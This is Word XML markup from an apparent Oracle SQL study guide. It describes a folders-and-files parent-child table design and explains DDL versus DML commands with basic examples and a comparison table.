        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>columns have the same name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without aliasing, Oracle throws ambiguity errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791F4817" w14:textId="77777777" w:rsidR="00656FDC" w:rsidRPr="00CE4B95"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3198" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1497B782" w14:textId="023F7AB9" w:rsidR="00E7593A" w:rsidRPr="00CE4B95" w:rsidRDefault="00E7593A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="756" w:name="_Toc197867970"/>
      <w:r w:rsidRPr="00CE4B95">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756"/>
    </w:p>
    <w:p w14:paraId="32A83A21" w14:textId="33AE30A1" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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xml:space="preserve">. This structure can be modeled using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>two tables</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Oracle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACAE551"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olders Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CC52C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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parent-child relationship</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CE4B95" w14:paraId="6EB5C551" w14:textId="77777777" w:rsidTr="003B7F92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D8F998B"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490244C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38402878" w14:textId="77777777" w:rsidTr="003B7F92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E5FB02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older</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w14:paraId="4D6FE661" w14:textId="77777777" w:rsidTr="003B7F92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="105D63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older</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w14:paraId="13A51B98" w14:textId="77777777" w:rsidTr="003B7F92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58E606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_id (for parent folder)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w14:paraId="14E456D4" w14:textId="77777777" w:rsidTr="003B7F92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40204DA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16E3AD94"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD8869A" w14:textId="77777777" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="003B7F92">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olders (</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parent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parent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55DA07C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Uniquely identifies each folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286A137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name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stores the folder's name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087AC8AE"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_id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Refers to the folder_id of the parent folder, creating a hierarchy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6971710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older is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4009439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es Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7337A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files and the folder in which they are stored. Each file can be associated with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>specific folder</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CE4B95" w14:paraId="4AC91C39" w14:textId="77777777" w:rsidTr="003B7F92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="652B9B5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0FF28838" w14:textId="77777777" w:rsidTr="003B7F92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="204C827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ile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w14:paraId="33503F59" w14:textId="77777777" w:rsidTr="003B7F92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66607B9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ile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w14:paraId="26DEA3F1" w14:textId="77777777" w:rsidTr="003B7F92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="289B0A7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s(folder_id)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w14:paraId="2878F8F0" w14:textId="77777777" w:rsidTr="003B7F92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="464412D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C92B39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43F2D28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iles</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6C9646"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iles (</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    file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ile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folder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7150FE6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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Uniquely identifies each file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3D51C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name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stores the name of the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A76D8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xml:space="preserve">: Refers to the folder_id in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 indicating which folder the file is stored in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6F6D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ile is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D1502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older and File Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFD1BB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 Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521C5D98"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A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (folder_id = 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253F7992" w14:textId="77777777" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="003B7F92">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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B</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (folder_id = 2, parent_id = 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F27985B" w14:textId="77777777" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="003B7F92">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="288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C</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (folder_id = 3, parent_id = 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0C8504" w14:textId="77777777" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="003B7F92">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360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1.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (file_id = 1, folder_id = 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6457DFDD"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Data into the Tables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4E7140"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007400"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Insert folders</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lastRenderedPageBreak/>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007400"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Insert file in the deepest folder (Folder C)</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iles (file_id, file_name, folder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ile1.t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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A386F10" w14:textId="0AF39958" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="000A0B7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="191A2AFE" w14:textId="4EF67D6C"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Tables Required:</w:t>
      </w:r>
      <w:r w:rsidR="00604E82"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2 Tables</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF00634"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for storing hierarchical folder information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622AA7A5"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the parent_id column in the </w:t>
      </w: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you can create a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nested folder structur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3199" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F40865A" w14:textId="0892FA18" w:rsidR="004A5A54" w:rsidRPr="00CE4B95" w:rsidRDefault="004A5A54">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="757" w:name="_Toc197867971"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are DDL and DML commands?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="757"/>
    </w:p>
    <w:p w14:paraId="622D585E" w14:textId="5010294B" w:rsidR="00EF05F0" w:rsidRPr="00393B05" w:rsidRDefault="00EF05F0"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 (Data Definition Language)</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ML (Data Manipulation Language)</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are two subsets of SQL commands that serve different purposes in the management and manipulation of databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A3F38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DDL (Data Definition Language)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC252A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DL Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740DB64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EATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to create new database objects such as tables, indexes, views, or schemas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D164A2F"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CREATE TABLE employees (id INT, name VARCHAR(50));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B28D419"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LTER</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to modify an existing database object, like adding/removing columns in a table or changing the data type of a column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185DB9E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ALTER TABLE employees ADD email VARCHAR(100);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB2498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ROP</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to delete an existing database object like a table, view, or index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BAD198"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ROP TABLE employees;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3207BE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TRUNCATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to remove all data from a table but keeps the table structure intact for future use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2293A6"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TRUNCATE TABLE employees;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F873EE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NAME</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to rename a database object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428486C5"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RENAME employees TO staff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71331A8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DML (Data Manipulation Language)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508D29D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ML commands are used to manipulate the actual data within the tables. They allow you to retrieve, insert, update, or delete data in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA0BC12"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ML Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5BCB1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ECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to query data from one or more tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358C09C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SELECT * FROM employees WHERE department = 'HR';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5860D76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SERT</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to insert new rows of data into a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1633C99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INSERT INTO employees (id, name, department) VALUES (1, 'John Doe', 'HR');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCA149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w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to modify existing data in a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7284405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UPDATE employees SET department = 'IT' WHERE id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A61E6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LETE</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to remove data from a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE84CF9"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ELETE FROM employees WHERE id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DDCF37"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637"/>
        <w:gridCol w:w="3051"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="376FE3A8" w14:textId="77777777" w:rsidTr="00EF05F0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F6333E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BCA9389"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DL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="058AC33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ML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="036F6C2B" w14:textId="77777777" w:rsidTr="00EF05F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A7D733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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19BA78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fines or modifies database objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="219C477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anipulates data in the tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="03E1669F" w14:textId="77777777" w:rsidTr="00EF05F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6495545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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FD223B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ALTER, DROP, RENAME, TRUNCATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BB1ED17"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INSERT, UPDATE, DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="683F069A" w14:textId="77777777" w:rsidTr="00EF05F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="792A9E60"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ffects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="730AC7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tructure of the database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F83396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ata within the database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="2161CE9A" w14:textId="77777777" w:rsidTr="00EF05F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54ED33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Execution Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2ADC16D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are permanent and cannot be rolled back (except for TRUNCATE which is often non-reversible)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5864782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can be rolled back with a transaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="39CFEF98" w14:textId="77777777" w:rsidTr="00EF05F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="403FB56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 Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
